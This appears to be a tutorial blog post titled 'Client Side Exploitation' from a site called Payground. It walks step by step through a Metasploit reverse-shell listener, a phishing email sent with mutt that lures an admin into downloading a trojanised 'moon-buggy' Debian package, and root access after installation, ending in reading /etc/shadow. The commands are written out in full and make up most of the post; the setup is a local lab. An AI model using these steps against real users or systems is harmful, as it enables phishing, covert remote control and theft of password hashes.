• Lucifer

Client Side Exploitation

In the Spear Phishing post HERE we saw how a malicious file can be delivered to a system by tricking a user into downloading and running a malicious executable. In this post, we will see how a malicious Debian package, when opened and installed on a target system, can provide an attacker with remote access to the system. So, let's see how we can do client-side exploitation step by step:

Client Side Exploitation

Step 1: Starting Metasploit Framework


First, we need to set up a listener that will wait for incoming connections. Launch the Metasploit Framework by entering the following command:


msfconsole -L

Client Side Exploitation

Step 2: Selecting Module


For this post we will use Generic Payload Handler, which provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework. Select the module by entering the following command:

use exploit/multi/handler

Client Side Exploitation

Step 3: Configuring Listener


Now let's configure the module to listen on the TCP port 4444 on our localhost IP and select the shell/reverse_tcp payload:

set LHOST 127.0.0.1


set LPORT 4444

set PAYLOAD linux/x86/shell/reverse_tcp

Client Side Exploitation

Step 4: Starting Listener


Now start the listener by entering exploit.

exploit

Client Side Exploitation

Now create a new tab by command Ctrl + Shift + T and switch to a new tab.


Step 5: Sending Phishing Email


For this attack we will send a download link rather than an attachment. The following command will send an invitation to download a game from a website:


echo "Check out this cool game! Download from <a href="http://skillsetlocal.com/moon-buggy.deb">here</a> for FREE." | mutt -e "set content_type=text/html" -s "Game Download" -- admin@skillsetlocal.com

Client Side Exploitation

Step 6: Checking Email


We will use mutt again to read the email:

mutt

Client Side Exploitation

Step 7: Reading Email


You should see our email in the inbox. Hit Enter to open it.

Client Side Exploitation

Next, hit v to view the attachment (which, in this case, is just the body of the email). Hit Enter to open it.

Client Side Exploitation

You should see our phishing email message with the download link highlighted in yellow.


Step 8: Downloading File


Hit Enter to follow the link, then hit d to download.

Client Side Exploitation

Next, use the down arrow key to select Save to disk and hit Enter.

Client Side Exploitation

Hit Enter again to accept the default filename.

Client Side Exploitation

Step 9: Installing Package


Exit mutt by hitting q, i, and q again (or press** Ctrl+C** and then Enter to confirm). Now let's install the downloaded package with the following command:

sudo dpkg -i moon-buggy.deb

Client Side Exploitation

Do you see anything unusual? No. The package is installing as normal, without any red flags being raised. Now let's return to our listener.


Again switch to tab 1.


Step 10: Using Reverse Shell


Let's see what kind of access we got. Enter the following command to get the user ID:

whoami

We are running as root! To confirm, let's read the /etc/shadow file:

cat /etc/shadow

Client Side Exploitation

Game over. Now again switch tabs.


Step 11: Playing Game


All quiet here. The admin user can enjoy the "cool free game" while the attacker is enjoying the root access to the system.

Enter moon-buggy to play the game. You can see that the package is fully functional, with a Trojan added as a "bonus feature".


moon-buggy

Client Side Exploitation

Also read: Spearphishing


That's it for this post hope you like it, please share it with your friends and more amazing stuff is waiting for you, checkout shop at Payground or visit HERE.

 
Join Telegram Group

©2020 by Payground. Proudly created with Wix.com